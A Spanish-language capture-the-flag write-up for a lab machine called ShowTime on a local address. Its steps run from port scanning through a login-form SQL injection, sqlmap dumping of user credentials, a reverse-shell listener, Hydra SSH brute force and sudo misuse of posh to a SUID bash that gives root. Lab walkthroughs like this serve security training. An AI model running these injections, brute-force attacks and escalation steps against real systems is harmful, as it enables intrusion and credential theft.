# ShowTime

### 🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 172.17.0.2
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FEhYrFMrsspAx4abCVuga%2Fimage.png?alt=media&#x26;token=ece3cdd3-3a35-4f81-a74d-d66d259ba148" alt=""><figcaption></figcaption></figure>

A continuación, realizamos el comando:

```bash
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FNnqgnnU9ZLnddkDypNpL%2Fimage.png?alt=media&#x26;token=00649026-98b0-460a-a9cb-735c9eda2080" alt=""><figcaption></figcaption></figure>

Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH** y el **puerto 80** perteneciente al **servicio HTTP** están abiertos por lo que a continuación se indagará más.

### 🔎 **EXPLORACIÓN**

Se utiliza el comando:

```bash
sudo nmap -sCV -p22,80 -v 172.17.0.2
```

para obtener más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FDRBkfbNP5ScHz1rwPAeS%2Fimage.png?alt=media&#x26;token=4dfb631b-4b00-4291-bf9b-751d406b026e" alt=""><figcaption></figcaption></figure>

Seguimos indagando más sobre los puertos y ahora indagamos sobre el **servicio HTTP**. Se ingresó la **dirección IP** en el navegador lo que llevó a que la página web del Casino.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FtpFy2IQgLcfV5eBtIBvf%2Fimage.png?alt=media&#x26;token=71fb9046-a255-4805-9952-a15299b91343" alt=""><figcaption></figcaption></figure>

Ahora buscaremos directorios y archivos con la herramienta **Gobuster** a través de:

```bash
gobuster dir -u http://172.17.0.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,doc,html,txt
```

Hacemos una **inyección SQL** básica en el directorio `/login_page`.

```bash
' OR '1'='1
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FWLuKr1frdGt7X1zxVvRG%2Fimage.png?alt=media&#x26;token=9fbf7869-4424-4f06-8831-5797225e3cc2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FHQwX7aLxmd0VJsrbKUMv%2Fimage.png?alt=media&#x26;token=428380e6-6f93-4fdf-a235-4ecf3830eba3" alt=""><figcaption></figcaption></figure>

Realizamos este comando para identificar bases de datos.

```bash
sqlmap -u http://172.17.0.2/login_page/index.php --forms --dbs --batch
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FtltcgsJ8vGmepMdLCjnf%2Fimage.png?alt=media&#x26;token=914acc1f-60fd-4c6c-a775-ed168fc5f973" alt=""><figcaption></figcaption></figure>

Ahora para ver las tablas dentro de la base de datos de **users**.

```bash
sqlmap -u http://172.17.0.2/login_page/index.php --forms -D users --tables --batch
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FRPRwLt2saxxbCS796KlW%2Fimage.png?alt=media&#x26;token=ed150e17-e1a2-45c1-a494-a352103ead8c" alt=""><figcaption></figcaption></figure>

Ahora vemos las columnas dentro de la tabla de **usuarios**.

```bash
sqlmap -u http://172.17.0.2/login_page/index.php --forms -D users -T usuarios --columns --batch
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FNAgVcgrPhU4QDWf71yl9%2Fimage.png?alt=media&#x26;token=658120ca-37fb-4985-8f6e-2c11d03e6a58" alt=""><figcaption></figcaption></figure>

Ahora vemos la información que hay guardada en los registros.

```bash
sqlmap -u http://172.17.0.2/login_page/index.php --forms -D users -T usuarios -C password,id,username --dump --batch
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Ftu0sFTLjmHEYIIlm6VJD%2Fimage.png?alt=media&#x26;token=d570c4cc-6b17-4be8-be5e-1b5514d03533" alt=""><figcaption></figcaption></figure>

### 🚀 **EXPLOTACIÓN**

Con el tercer usuario nos logueamos y nos sale un panel de administración en el que podemos ejecutar un comando en **Python**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FBNv4hufFTG0kEskHJaoD%2Fimage.png?alt=media&#x26;token=a6de8294-af99-4e18-8d17-2d5be294755b" alt=""><figcaption></figcaption></figure>

Nos ponemos en escucha para recibir la Reverse Shell.

```bash
nc -nlvp 443
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FiUiqMLmFydF91aFIQx8y%2Fimage.png?alt=media&#x26;token=83f2db9e-5700-41f2-86da-2694021e67a3" alt=""><figcaption></figcaption></figure>

Hacemos el [tratamiento de la TTY](https://invertebr4do.github.io/tratamiento-de-tty/) para trabajar más cómodos.

### 🔐 **PRIVILEGIOS**

Al estar dentro y ejecutar:

```bash
whoami
```

aún no somos **root**, por lo que hacemos:

```bash
sudo -l
```

para ver si hay algo para explotar. No tenemos permisos con SUDO.

En el directorio `/tmp` hay una archivo del texto oculto.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fp1lWfvsqrZiW8CwFrJhl%2Fimage.png?alt=media&#x26;token=c14edb65-7a7d-4ac5-93a2-57f33c84d205" alt=""><figcaption></figcaption></figure>

Creamos un diccionario pasando de mayúsculas a minúsculas para realizar la fuerza bruta.

```bash
tr '[:upper:]' '[:lower:]' < trucos.txt > diccionario.txt
```

Realizamos el ataque de fuerza bruta mediante **Hydra**.

```bash
hydra -l joe -P diccionario.txt ssh://172.17.0.2 -t 64
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FMOFikqJoz0GmBVn6V9BK%2Fimage.png?alt=media&#x26;token=3099cbb3-464b-4e85-ac02-9d819a1930eb" alt=""><figcaption></figcaption></figure>

Nos logueamos con esas credenciales encontradas.

```bash
ssh joe@172.17.0.2
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FKlTMhdsSsrv34s2UMOMI%2Fimage.png?alt=media&#x26;token=9bc12645-2ec6-4928-bf06-818462afa1ce" alt=""><figcaption></figcaption></figure>

Tenemos permisos **SUDO** con **posh** por lo que miramos esta [página ](https://gtfobins.github.io/gtfobins/posh/)para ver como escalar privilegios.

```bash
sudo -u luciano /bin/posh
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FsZrCsgn8f0FgulCwWGAW%2Fimage.png?alt=media&#x26;token=bc7cd15f-86ed-49aa-a4f3-3d289c460368" alt=""><figcaption></figcaption></figure>

En el directorio de **luciano** principal encontramos un script que no podemos editar con nano ni con vim por lo que lo hacemos con echo.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FsA2JqFilkHIlwIYENU5O%2Fimage.png?alt=media&#x26;token=7623f79b-ed80-42c2-80f5-518e1e8dbb69" alt=""><figcaption></figcaption></figure>

```bash
echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > script.sh
```

Ahora ejecutamos el script para ser **root**.

```bash
sudo -u root /bin/bash /home/luciano/script.sh 
```

Ejecutamos.

```bash
bash -p
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FERZtzbvfSjj5hfajCeEi%2Fimage.png?alt=media&#x26;token=10cfa56f-5e39-4f74-b113-ea8c8e471537" alt=""><figcaption></figcaption></figure>
